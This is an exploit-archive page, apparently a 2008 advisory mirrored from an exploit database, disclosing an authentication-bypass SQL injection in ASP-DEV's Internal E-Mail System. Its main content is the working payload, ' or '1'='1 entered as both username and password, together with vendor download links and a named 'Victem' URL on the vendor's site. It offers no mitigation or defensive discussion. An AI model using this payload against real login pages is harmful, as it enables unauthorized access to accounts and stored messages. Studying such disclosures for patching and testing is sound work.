[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : ASP-DEV Internal E-Mail System (Auth Bypass) SQL Injection Vuln
# Published : 2008-12-14
# Author : Pouya_Server
# Previous Title : ASPired2Quote (quote.mdb) Remote Database Disclosure Vulnerability
# Next Title : AutositePHP 2.0.3 (LFI/CSRF/Edit File) Multiple Remote Vulnerabilities


#########################################################
---------------------------------------------------------
Portal Name: Internal E-Mail System
Vendor : http://asp-dev.com/main.asp?page=41
Download : http://asp-dev.com/download.asp?did=4
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (Auth Bypass) SQL Injection Vulnerability
---------------------------------------------------------
#########################################################
[Auth Bypass]:
user: ' or '1'='1
pass: ' or '1'='1
 
---------------------------------
Victem :
http://asp-dev.com/message

# www.Syue.com [2008-12-14]